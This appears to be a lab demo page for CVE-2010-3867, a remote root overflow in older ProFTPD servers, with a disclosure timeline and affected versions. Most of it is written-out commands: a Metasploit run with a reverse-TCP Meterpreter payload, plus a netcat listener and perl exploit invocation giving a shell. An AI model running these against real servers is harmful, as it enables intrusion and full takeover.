CVE-2010-3867 : ProFTPD IAC Remote Root Exploit

Timeline :

Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07

PoC provided by :

jduck for Metasploit exploit
Kingcope for Exploit-DB exploit

Reference(s) :

CVE-2010-3867
EDB-15449

Affected version(s) :

ProFTPD versions between 1.3.2rc3 and 1.3.3b

Tested on Debian Squeeze with :

ProFTPD proftpd-basic_1.3.3a-4_i386.deb

Description :

This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.

Metasploit Demo :

use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid
ipconfig

Exploit-DB demo :

nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig